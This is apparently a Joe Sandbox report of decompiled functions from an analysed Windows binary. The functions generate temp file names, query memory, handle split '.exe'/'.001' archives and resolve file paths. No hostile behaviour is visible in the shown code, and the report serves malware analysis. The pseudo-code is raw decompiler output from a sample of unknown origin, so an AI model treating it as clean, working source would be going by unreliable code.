Function 0040492E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040492E(intOrPtr __ecx, void* __edx, signed short** _a4, signed char _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v28;
				void* __ebp;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				void* _t25;
				signed char _t26;
				long _t28;
				signed int _t34;
				signed char _t35;
				void* _t40;
				void* _t42;
				void* _t49;
				unsigned int _t53;
				signed short** _t54;
				unsigned int _t59;
				void* _t60;

				_t42 = __edx;
				_v12 = __ecx;
				_t21 = GetCurrentThreadId();
				_t22 = GetTickCount();
				_t23 = GetCurrentProcessId();
				_t54 = _a4;
				_t59 = (_t21 << 0x00000002 ^ _t22) << 0x0000000c ^ _t23;
				_v8 = _v8 & 0x00000000;
				do {
					E0040376E(_t54, _v12);
					if(_t42 == 0) {
						L12:
						_t69 = _a8;
						_t42 = 1;
						if(_a8 != 0) {
							E004039D8(_t54, ".tmp");
						}
						_t25 = E004051AE( *_t54, _t69); // executed
						if(_t25 == 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								_t26 = E0040447D( *_t54);
							} else {
								_t26 = E00405489( *_t54, 0);
							}
							__eflags = _t26;
							if(_t26 != 0) {
								return 1;
							} else {
								_t28 = GetLastError();
								__eflags = _t28 - 0x50;
								if(_t28 == 0x50) {
									goto L22;
								}
								__eflags = _t28 - 0xb7;
								if(_t28 != 0xb7) {
									break;
								}
								goto L22;
							}
						} else {
							SetLastError(0xb7);
							goto L22;
						}
					}
					_t53 = _t59;
					_t49 = 0;
					do {
						_t34 = _t53 & 0x0000000f;
						_t53 = _t53 >> 4;
						if(_t34 >= 0xa) {
							_t35 = _t34 + 0x37;
							__eflags = _t35;
						} else {
							_t35 = _t34 + 0x30;
						}
						 *(_t60 + _t49 - 0x18) = _t35;
						_t49 = _t49 + 1;
					} while (_t49 < 8);
					 *(_t60 + _t49 - 0x18) =  *(_t60 + _t49 - 0x18) & 0x00000000;
					if(_a8 != 0) {
						E00401EF8(_t54, 0x2e);
					}
					E004039D8(_t54,  &_v28);
					_t40 = GetTickCount() + 2;
					if(_t40 == 0) {
						_t40 = 1;
					}
					_t59 = _t59 + _t40;
					goto L12;
					L22:
					_v8 = _v8 + 1;
				} while (_v8 < 0x64);
				_t54[1] = _t54[1] & 0x00000000;
				 *( *_t54) =  *( *_t54) & 0x00000000;
				return 0;
			}

0x00404937
0x00404939
0x0040493c
0x00404947
0x00404952
0x00404958
0x0040495b
0x0040495d
0x00404961
0x00404966
0x0040496d
0x004049c0
0x004049c0
0x004049c4
0x004049c6
0x004049cf
0x004049cf
0x004049d6
0x004049dd
0x004049ef
0x004049f1
0x00404a01
0x004049f3
0x004049f8
0x004049f8
0x00404a06
0x00404a08
0x00000000
0x00404a0a
0x00404a0a
0x00404a10
0x00404a13
0x00000000
0x00000000
0x00404a15
0x00404a1a
0x00000000
0x00000000
0x00000000
0x00404a1a
0x004049df
0x004049e4
0x00000000
0x004049e4
0x004049dd
0x0040496f
0x00404971
0x00404973
0x00404975
0x00404978
0x0040497e
0x00404985
0x00404985
0x00404980
0x00404980
0x00404980
0x00404988
0x0040498c
0x0040498d
0x00404992
0x0040499b
0x004049a1
0x004049a1
0x004049ac
0x004049b8
0x004049b9
0x004049bd
0x004049bd
0x004049be
0x00000000
0x00404a1c
0x00404a1c
0x00404a1f
0x00404a2b
0x00404a2f
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 0040493C
GetTickCount.KERNEL32 ref: 00404947
GetCurrentProcessId.KERNEL32(?,00000000,00404A99,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00404952
GetTickCount.KERNEL32 ref: 004049B1
SetLastError.KERNEL32(000000B7,00000000,?,00000000,00404A99,?,00000000), ref: 004049E4
GetLastError.KERNEL32(00000000,?,00000000,00404A99,?,00000000), ref: 00404A0A

Part of subcall function 0040447D: CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480

Strings

.tmp, xrefs: 004049C8
d, xrefs: 00404A1F

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThread
String ID: .tmp$d
API String ID: 3074393274-2797371523
Opcode ID: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
Instruction ID: 18cd839078860563eabca9c9166aecfd8bb13a7da93ccbaeff0eff10b9c7e743
Opcode Fuzzy Hash: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
Instruction Fuzzy Hash: D331EDF2A402049BDB14ABB4D84A7AF7B65ABD1319F14413BEA42B72C1D73C8C418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406018, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406018(intOrPtr* __ecx) {
				struct _MEMORYSTATUS _v36;
				signed int _v56;
				intOrPtr _v60;
				struct _MEMORYSTATUSEX _v100;
				_Unknown_base(*)()* _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				signed int _t27;
				intOrPtr* _t28;
				void* _t31;

				_t28 = __ecx;
				 *__ecx = 0x80000000;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				_v100.dwLength = 0x40;
				_t20 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t20 == 0) {
					L8:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t22 = _v36.dwTotalVirtual;
					if(_t22 >= _v36.dwTotalPhys) {
						_t22 = _v36.dwTotalPhys;
					}
					 *_t28 = _t22;
					 *(_t28 + 4) =  *(_t28 + 4) & 0x00000000;
				} else {
					GlobalMemoryStatusEx( &_v100); // executed
					if(_t20 == 0) {
						goto L8;
					} else {
						_t27 = _v56;
						_t24 = _v100.ullTotalPhys;
						_t31 = _t27 - _v100.ullAvailPhys;
						if(_t31 > 0 || _t31 >= 0 && _v60 >= _t24) {
							_t27 = _v100.ullAvailPhys;
						} else {
							_t24 = _v60;
						}
						 *_t28 = _t24;
						 *(_t28 + 4) = _t27;
					}
				}
				return 1;
			}

0x0040601f
0x0040602b
0x00406031
0x00406035
0x00406043
0x0040604b
0x00406078
0x0040607b
0x00406083
0x00406089
0x0040608f
0x00406091
0x00406091
0x00406094
0x00406096
0x0040604d
0x00406051
0x00406055
0x00000000
0x00406057
0x00406057
0x0040605a
0x0040605d
0x00406060
0x0040606e
0x00406069
0x00406069
0x00406069
0x00406071
0x00406073
0x00406073
0x00406055
0x0040609e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040603C
GetProcAddress.KERNEL32(00000000), ref: 00406043
GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406051
GlobalMemoryStatus.KERNEL32 ref: 00406083

Strings

kernel32.dll, xrefs: 00406026
GlobalMemoryStatusEx, xrefs: 00406021
@, xrefs: 00406035
, xrefs: 0040607B

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: GlobalMemoryStatus$AddressHandleModuleProc
String ID: $@$GlobalMemoryStatusEx$kernel32.dll
API String ID: 180289352-802862622
Opcode ID: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
Instruction ID: 6939841f741f7d36a15a20a0e3427741af3cfa69e4de5986cbad5950b484ded2
Opcode Fuzzy Hash: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
Instruction Fuzzy Hash: A9115B749403099BDF10DFA4C949BAEBBF5EB04705F11442EE546B7280D778A894CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A53F, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0040A53F(void* __ecx) {
				signed char _t119;
				signed int _t120;
				signed int _t121;
				signed char _t122;
				signed int _t126;
				signed int _t127;
				void* _t136;
				void* _t139;
				void* _t144;
				void* _t145;
				void* _t150;
				signed int _t158;
				signed int _t159;
				signed int _t164;
				signed int _t170;
				long _t172;
				signed int _t173;
				signed int _t174;
				intOrPtr* _t178;
				signed char _t183;
				void* _t185;
				signed int _t233;
				void* _t236;
				signed char _t238;
				void* _t239;

				E00418D80(E00419E42, _t239);
				_t236 = __ecx;
				 *(_t239 - 0x10) = 0;
				 *(_t239 - 4) = 0;
				 *(_t239 - 0x14) = 0;
				_t233 =  *(_t239 + 8);
				 *(_t239 - 4) = 1;
				 *(_t239 - 0x18) = 0;
				if( *((intOrPtr*)(_t233 + 0x40)) == 0) {
					__eflags =  *(_t233 + 0x30);
					if( *(_t233 + 0x30) != 0) {
						goto L16;
					} else {
						_push(0x24);
						_t164 = E004031DD();
						 *(_t239 + 8) = _t164;
						__eflags = _t164;
						 *(_t239 - 4) = 2;
						if(_t164 == 0) {
							 *(_t239 + 8) = 0;
						} else {
							 *(_t239 + 8) = E004065B9(_t164);
						}
						 *(_t239 - 4) = 1;
						 *(_t239 - 0x18) =  *(_t239 + 8);
						E004063E5(_t239 - 0x10,  *(_t239 + 8));
						E004037D2(_t236 + 0x70, _t236 + 0x7c);
						_t170 = E004053B3( *((intOrPtr*)(_t236 + 0x70)));
						__eflags = _t170;
						if(_t170 != 0) {
							 *(_t233 + 0x30) =  *(_t239 - 0x10);
							 *(_t236 + 0xdf) = 1;
							goto L16;
						} else {
							_t172 = GetLastError();
							 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
							_t238 = _t172;
							_t173 =  *(_t239 - 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								 *((intOrPtr*)( *_t173 + 8))(_t173);
							}
							_t174 =  *(_t239 - 0x10);
							 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
							__eflags = _t174;
							if(_t174 != 0) {
								 *((intOrPtr*)( *_t174 + 8))(_t174);
							}
							_t122 = _t238;
						}
					}
				} else {
					_push(8);
					_t178 = E004031DD();
					if(_t178 == 0) {
						_t178 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t178 + 4)) = 0;
						 *_t178 = 0x41bb0c;
					}
					E004063E5(_t239 - 0x14, _t178);
					 *(_t233 + 0x34) =  *(_t239 - 0x14);
					L16:
					_push(_t233);
					_t119 = E0040A2C8(_t236); // executed
					 *(_t236 + 0xdf) =  *(_t236 + 0xdf) & 0x00000000;
					_t183 = _t119;
					if(_t183 != 1 ||  *(_t239 - 0x18) == 0 ||  *((intOrPtr*)(_t233 + 0x3c)) == 0 ||  *((char*)(_t236 + 0x43)) != 0 && ( *(_t236 + 0x44) & _t119) == 0) {
						_t120 =  *(_t239 - 0x14);
						 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
						__eflags = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)( *_t120 + 8))(_t120);
						}
						_t121 =  *(_t239 - 0x10);
						 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
						__eflags = _t121;
						if(_t121 != 0) {
							 *((intOrPtr*)( *_t121 + 8))(_t121);
						}
						_t122 = _t183;
					} else {
						if( *(_t236 + 0x80) <= 4) {
							L32:
							_t126 =  *(_t239 - 0x14);
							 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
							if(_t126 != 0) {
								 *((intOrPtr*)( *_t126 + 8))(_t126);
							}
							_t127 =  *(_t239 - 0x10);
							 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
							if(_t127 != 0) {
								 *((intOrPtr*)( *_t127 + 8))(_t127);
							}
							_t122 = 1;
						} else {
							_t185 = _t236 + 0x7c;
							if(E004032CE( *((intOrPtr*)(_t236 + 0x7c)) +  *(_t236 + 0x80) * 2 - 8, ".exe") == 0) {
								goto L32;
							} else {
								E00409111(_t185, _t239 - 0x30,  *(_t236 + 0x80) + 0xfffffffc);
								_t136 =  *_t233;
								 *(_t239 + 8) =  *(_t239 + 8) & 0x00000000;
								 *(_t239 - 4) = 3;
								if( *((intOrPtr*)(_t136 + 0xc)) <= 0) {
									L31:
									E00403204(_t136,  *((intOrPtr*)(_t239 - 0x30)));
									goto L32;
								} else {
									do {
										_t186 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 8)) +  *(_t239 + 8) * 4));
										_t139 = E004032CE( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t136 + 8)) +  *(_t239 + 8) * 4)) + 0xc)), "Split");
										_t254 = _t139;
										if(_t139 != 0) {
											goto L30;
										} else {
											E00403740(_t239 - 0x24, _t254, _t239 - 0x30);
											 *(_t239 - 4) = 4;
											E00401EF8(_t239 - 0x24, 0x2e);
											_t144 = E0040A8B7(_t186, _t239 - 0x3c);
											 *(_t239 - 4) = 5;
											_t145 = E0040399C(_t239 - 0x24, _t254, _t144);
											 *(_t239 - 4) = 4;
											E00403204(_t145,  *((intOrPtr*)(_t239 - 0x3c)));
											_t187 = _t236 + 0x70;
											E004037D2(_t236 + 0x70, _t239 - 0x24);
											E004039D8(_t236 + 0x70, ".001");
											_t150 = E0040A891( *((intOrPtr*)(_t233 + 0x3c)), _t254,  *(_t236 + 0x70));
											_t255 = _t150;
											if(_t150 != 0) {
												L27:
												if(E004053B3( *_t187) == 0) {
													goto L29;
												} else {
													 *(_t233 + 0x30) =  *(_t239 - 0x10);
													 *(_t236 + 0x4c) =  *(_t236 + 0x4c) | 0xffffffff;
													E00409944(_t236 + 0x40);
													_push(_t233);
													if(E0040A2C8(_t236) == 0) {
														E00403204(E00403204(_t152,  *((intOrPtr*)(_t239 - 0x24))),  *((intOrPtr*)(_t239 - 0x30)));
														_t158 =  *(_t239 - 0x14);
														 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
														__eflags = _t158;
														if(_t158 != 0) {
															 *((intOrPtr*)( *_t158 + 8))(_t158);
														}
														_t159 =  *(_t239 - 0x10);
														 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
														__eflags = _t159;
														if(_t159 != 0) {
															 *((intOrPtr*)( *_t159 + 8))(_t159);
														}
														_t122 = 0;
													} else {
														goto L29;
													}
												}
											} else {
												E004037D2(_t187, _t239 - 0x24);
												if(E0040A891( *((intOrPtr*)(_t233 + 0x3c)), _t255,  *_t187) == 0) {
													L29:
													 *(_t239 - 4) = 3;
													E00403204(_t152,  *((intOrPtr*)(_t239 - 0x24)));
													goto L30;
												} else {
													goto L27;
												}
											}
										}
										goto L47;
										L30:
										 *(_t239 + 8) =  *(_t239 + 8) + 1;
										_t136 =  *_t233;
									} while ( *(_t239 + 8) <  *((intOrPtr*)(_t136 + 0xc)));
									goto L31;
								}
							}
						}
					}
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return _t122;
			}

0x0040a544
0x0040a551
0x0040a553
0x0040a556
0x0040a559
0x0040a55c
0x0040a55f
0x0040a563
0x0040a569
0x0040a598
0x0040a59b
0x00000000
0x0040a5a1
0x0040a5a1
0x0040a5a3
0x0040a5a9
0x0040a5ac
0x0040a5ae
0x0040a5b2
0x0040a5c0
0x0040a5b4
0x0040a5bb
0x0040a5bb
0x0040a5ca
0x0040a5ce
0x0040a5d1
0x0040a5df
0x0040a5ec
0x0040a5f1
0x0040a5f3
0x0040a629
0x0040a62c
0x00000000
0x0040a5f5
0x0040a5f5
0x0040a5fb
0x0040a5ff
0x0040a601
0x0040a604
0x0040a606
0x0040a60b
0x0040a60b
0x0040a60e
0x0040a611
0x0040a615
0x0040a617
0x0040a61c
0x0040a61c
0x0040a61f
0x0040a61f
0x0040a5f3
0x0040a56b
0x0040a56b
0x0040a56d
0x0040a575
0x0040a582
0x0040a582
0x0040a577
0x0040a577
0x0040a57a
0x0040a57a
0x0040a588
0x0040a590
0x0040a633
0x0040a633
0x0040a636
0x0040a63b
0x0040a642
0x0040a647
0x0040a81d
0x0040a820
0x0040a824
0x0040a826
0x0040a82b
0x0040a82b
0x0040a82e
0x0040a831
0x0040a835
0x0040a837
0x0040a83c
0x0040a83c
0x0040a83f
0x0040a670
0x0040a679
0x0040a7be
0x0040a7be
0x0040a7c1
0x0040a7c7
0x0040a7cc
0x0040a7cc
0x0040a7cf
0x0040a7d2
0x0040a7d8
0x0040a7dd
0x0040a7dd
0x0040a7e2
0x0040a67f
0x0040a688
0x0040a69b
0x00000000
0x0040a6a1
0x0040a6b1
0x0040a6b6
0x0040a6b8
0x0040a6bc
0x0040a6c4
0x0040a7b5
0x0040a7b8
0x00000000
0x0040a6ca
0x0040a6ca
0x0040a6d5
0x0040a6db
0x0040a6e0
0x0040a6e2
0x00000000
0x0040a6e8
0x0040a6ef
0x0040a6f9
0x0040a6fd
0x0040a708
0x0040a711
0x0040a715
0x0040a71d
0x0040a721
0x0040a727
0x0040a730
0x0040a73c
0x0040a746
0x0040a74b
0x0040a74d
0x0040a768
0x0040a777
0x00000000
0x0040a779
0x0040a77f
0x0040a782
0x0040a786
0x0040a78b
0x0040a795
0x0040a7f0
0x0040a7f5
0x0040a7f8
0x0040a7fd
0x0040a800
0x0040a805
0x0040a805
0x0040a808
0x0040a80b
0x0040a80f
0x0040a811
0x0040a816
0x0040a816
0x0040a819
0x00000000
0x00000000
0x00000000
0x0040a795
0x0040a74f
0x0040a755
0x0040a766
0x0040a797
0x0040a79a
0x0040a79e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a766
0x0040a74d
0x00000000
0x0040a7a4
0x0040a7a4
0x0040a7a7
0x0040a7ac
0x00000000
0x0040a6ca
0x0040a6c4
0x0040a69b
0x0040a679
0x0040a647
0x0040a841
0x0040a847
0x0040a84f

APIs

__EH_prolog.LIBCMT ref: 0040A544
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 0040A5F5

Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Part of subcall function 0040A2C8: __EH_prolog.LIBCMT ref: 0040A2CD

Strings

Split, xrefs: 0040A6D0
.001, xrefs: 0040A735
.exe, xrefs: 0040A68B

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ErrorExceptionLastThrowmalloc
String ID: .001$.exe$Split
API String ID: 1950902910-1819480430
Opcode ID: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
Instruction ID: fbde023dd8d3616a20bf780c395040672d5308453d4d409ddda090532e3e46f0
Opcode Fuzzy Hash: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
Instruction Fuzzy Hash: 21A18030A003099FCB14EFA5C585AAEBBB4BF04318F14846EE856BB2D1CB39DE55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404DAF, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00404DAF(intOrPtr* __ecx, void* __eflags) {
				signed int _t129;
				signed int _t130;
				intOrPtr _t131;
				signed int _t132;
				char _t133;
				char _t135;
				signed int _t140;
				signed char _t141;
				signed int _t148;
				intOrPtr _t155;
				intOrPtr _t156;
				void* _t162;
				intOrPtr _t163;
				signed int _t164;
				signed int _t182;
				signed int _t192;
				char _t194;
				signed char _t196;
				void* _t197;
				signed char _t198;
				signed char _t199;
				intOrPtr* _t204;
				void* _t215;
				signed int _t241;
				intOrPtr* _t253;
				short _t255;
				intOrPtr* _t257;
				intOrPtr* _t259;
				void* _t260;

				E00418D80(E0041998C, _t260);
				_t253 =  *((intOrPtr*)(_t260 + 8));
				_t257 = __ecx;
				_t192 = E00405780(_t253, __eflags);
				if(_t192 < 0 ||  *((short*)(_t253 + 2 + _t192 * 2)) == 0) {
					L28:
					 *(_t260 - 0x10) =  *(_t260 - 0x10) | 0xffffffff;
					 *(_t260 - 4) = 5;
					_t129 = E00405719(_t253);
					__eflags = _t129;
					if(_t129 != 0) {
						_push(4);
						_pop(0);
					}
					 *((intOrPtr*)(_t260 + 8)) = _t253;
					_t130 = E004055DE(_t253);
					__eflags = _t130;
					if(_t130 == 0) {
						L37:
						_t131 =  *_t253;
						__eflags = _t131 - 0x5c;
						if(_t131 == 0x5c) {
							L39:
							__eflags =  *((short*)(_t253 + 2));
							_t204 = _t253;
							if( *((short*)(_t253 + 2)) != 0) {
								_t132 = E00405693(_t204);
								__eflags = _t132;
								if(__eflags <= 0) {
									goto L54;
								}
								__eflags =  *((short*)(_t253 + _t132 * 2));
								_t208 = _t253 + _t132 * 2;
								 *((intOrPtr*)(_t260 - 0x14)) = _t253 + _t132 * 2;
								if(__eflags == 0) {
									goto L54;
								}
								__eflags = E00405596(_t208);
								if(__eflags >= 0) {
									goto L54;
								}
								E004036B0(_t260 - 0x38, _t253);
								 *(_t260 - 4) = 6;
								E00401EF8(_t260 - 0x38, 0x5c);
								E00401EF8(_t260 - 0x38, 0x2a);
								 *(_t260 + 0xb) =  *(_t260 + 0xb) & 0x00000000;
								_t140 = E00404B47(_t260 - 0x10, __eflags,  *((intOrPtr*)(_t260 - 0x38)), _t257);
								__eflags = _t140;
								if(_t140 == 0) {
									L50:
									_t141 = E00404DA0(_t253);
									__eflags =  *(_t260 + 0xb);
									_t196 = _t141;
									if( *(_t260 + 0xb) != 0) {
										L58:
										E00404D7D(_t257);
										__eflags = _t196 - 0xffffffff;
										if(_t196 == 0xffffffff) {
											 *(_t257 + 0x20) = 0x10;
										} else {
											 *(_t257 + 0x20) = _t196;
										}
										_push( *((intOrPtr*)(_t260 - 0x14)));
										_t215 = _t257 + 0x28;
										L62:
										E00403204(E0040376E(_t215),  *((intOrPtr*)(_t260 - 0x38)));
										E00404B27(_t260 - 0x10);
										_t135 = 1;
										goto L57;
									}
									__eflags = _t196 - 0xffffffff;
									if(__eflags == 0) {
										L53:
										 *(_t260 - 4) = 5;
										E00403204(_t141,  *((intOrPtr*)(_t260 - 0x38)));
										goto L54;
									}
									__eflags = _t196 & 0x00000010;
									if(__eflags != 0) {
										goto L58;
									}
									goto L53;
								}
								_t197 = _t257 + 0x28;
								_t148 = wcscmp( *(_t257 + 0x28), 0x41b778);
								__eflags = _t148;
								if(_t148 != 0) {
									 *(_t260 + 0xb) = 1;
									goto L50;
								}
								_push( *((intOrPtr*)(_t260 - 0x14)));
								_t215 = _t197;
								goto L62;
							}
							_t198 = E00404DA0(_t204);
							__eflags = _t198 - 0xffffffff;
							if(__eflags == 0) {
								goto L54;
							}
							__eflags = _t198 & 0x00000010;
							if(__eflags == 0) {
								goto L54;
							}
							E00404D7D(_t257);
							 *(_t257 + 0x2c) =  *(_t257 + 0x2c) & 0x00000000;
							 *( *(_t257 + 0x28)) =  *( *(_t257 + 0x28)) & 0x00000000;
							 *(_t257 + 0x20) = _t198;
							goto L36;
						}
						__eflags = _t131 - 0x2f;
						if(__eflags != 0) {
							goto L54;
						}
						goto L39;
					} else {
						__eflags =  *((short*)(_t253 + 6));
						if( *((short*)(_t253 + 6)) != 0) {
							goto L37;
						}
						_t199 = E00404DA0(_t253);
						__eflags = _t199 - 0xffffffff;
						if(__eflags == 0) {
							L54:
							_t133 = E00404B47(_t260 - 0x10, __eflags, _t253, _t257); // executed
							_t194 = _t133;
							L55:
							E00404B27(_t260 - 0x10);
							goto L56;
						}
						__eflags = _t199 & 0x00000010;
						if(__eflags == 0) {
							goto L54;
						}
						E00404D7D(_t257);
						 *(_t257 + 0x20) = _t199;
						_t259 = _t257 + 0x28;
						E0040376E(_t259,  *((intOrPtr*)(_t260 + 8)));
						_t155 = 2;
						__eflags =  *((intOrPtr*)(_t259 + 4)) - _t155;
						if( *((intOrPtr*)(_t259 + 4)) > _t155) {
							 *((intOrPtr*)(_t259 + 4)) = _t155;
							_t156 =  *_t259;
							_t86 = _t156 + 4;
							 *_t86 =  *(_t156 + 4) & 0x00000000;
							__eflags =  *_t86;
						}
						L36:
						_t194 = 1;
						goto L55;
					}
				} else {
					E004036B0(_t260 - 0x2c, _t253 + _t192 * 2);
					 *(_t260 - 4) =  *(_t260 - 4) & 0x00000000;
					E004036B0(_t260 - 0x20, _t253);
					 *(_t260 - 4) = 1;
					if(_t192 <  *(_t260 - 0x1c)) {
						 *(_t260 - 0x1c) = _t192;
						 *( *((intOrPtr*)(_t260 - 0x20)) + _t192 * 2) =  *( *((intOrPtr*)(_t260 - 0x20)) + _t192 * 2) & 0x00000000;
					}
					_t160 =  *(_t260 - 0x28);
					if( *(_t260 - 0x28) <= 6 || E004032CE( *((intOrPtr*)(_t260 - 0x2c)) + _t160 * 2 - 0xc, ":$DATA") == 0) {
						E004039D8(_t260 - 0x2c, ":$DATA");
					}
					_t162 = E004056F0( *((intOrPtr*)(_t260 - 0x20)));
					_t163 =  *((intOrPtr*)(_t260 - 0x20));
					if(_t162 == 0 || _t192 != 2 && (_t192 != 3 ||  *((short*)(_t163 + 4)) != 0x5c)) {
						_t164 = E00404DAF(_t257, __eflags, _t163);
						__eflags = _t164;
						if(_t164 == 0) {
							E00403204(E00403204(_t164,  *((intOrPtr*)(_t260 - 0x20))),  *((intOrPtr*)(_t260 - 0x2c)));
							goto L28;
						}
						_t255 = 0;
						__eflags = 0;
						goto L15;
					} else {
						E00404D7D(_t257);
						_t247 = _t257 + 0x28;
						_t255 = 0;
						 *((intOrPtr*)(_t257 + 0x2c)) = 0;
						 *( *(_t257 + 0x28)) = 0;
						if(_t192 == 2) {
							E004037D2(_t247, _t260 - 0x20);
						}
						L15:
						 *(_t257 + 0x20) =  *(_t257 + 0x20) & 0x0000fbef;
						 *(_t260 - 0x3c) =  *(_t260 - 0x3c) | 0xffffffff;
						 *_t257 = _t255;
						 *((intOrPtr*)(_t257 + 4)) = _t255;
						 *(_t260 - 4) = 2;
						E00403740(_t260 - 0x38,  *(_t260 - 0x3c), _t260 - 0x20);
						 *(_t260 - 4) = 3;
						E0040368D(_t260 - 0x54);
						while(1) {
							 *(_t260 - 4) = 4;
							if(E00404D3D(_t260 - 0x3c, _t260 - 0x54, _t260 + 0xb) == 0) {
								break;
							}
							if( *(_t260 + 0xb) == 0) {
								SetLastError(2);
								break;
							}
							if(E00403210( *((intOrPtr*)(_t260 - 0x54)),  *((intOrPtr*)(_t260 - 0x2c))) != 0) {
								_t241 =  *(_t260 - 0x50);
								__eflags = _t241 - 7;
								if(__eflags > 0) {
									_t182 = _t241 - 6;
									__eflags = _t182 - _t241;
									if(__eflags < 0) {
										 *(_t260 - 0x50) = _t182;
										 *((short*)( *((intOrPtr*)(_t260 - 0x54)) + _t182 * 2)) = _t255;
									}
								}
								E0040399C(_t257 + 0x28, __eflags, _t260 - 0x54);
								 *((char*)(_t257 + 0x24)) = 1;
								 *_t257 =  *((intOrPtr*)(_t260 - 0x44));
								_t172 =  *((intOrPtr*)(_t260 - 0x40));
								 *((intOrPtr*)(_t257 + 4)) =  *((intOrPtr*)(_t260 - 0x40));
								_t194 = 1;
								L26:
								E00403204(E00403204(_t172,  *((intOrPtr*)(_t260 - 0x54))),  *((intOrPtr*)(_t260 - 0x38)));
								E00403204(E00403204(E00404B27(_t260 - 0x3c),  *((intOrPtr*)(_t260 - 0x20))),  *((intOrPtr*)(_t260 - 0x2c)));
								L56:
								_t135 = _t194;
								L57:
								 *[fs:0x0] =  *((intOrPtr*)(_t260 - 0xc));
								return _t135;
							}
							 *(_t260 - 4) = 3;
							E00403204(_t178,  *((intOrPtr*)(_t260 - 0x54)));
							E0040368D(_t260 - 0x54);
						}
						_t194 = 0;
						goto L26;
					}
				}
			}

0x00404db4
0x00404dbf
0x00404dc2
0x00404dcb
0x00404dcf
0x00404f83
0x00404f83
0x00404f89
0x00404f92
0x00404f97
0x00404f99
0x00404f9b
0x00404f9d
0x00404f9d
0x00404fa1
0x00404fa4
0x00404fa9
0x00404fab
0x00405000
0x00405000
0x00405003
0x00405007
0x00405013
0x00405013
0x00405018
0x0040501a
0x0040504c
0x00405051
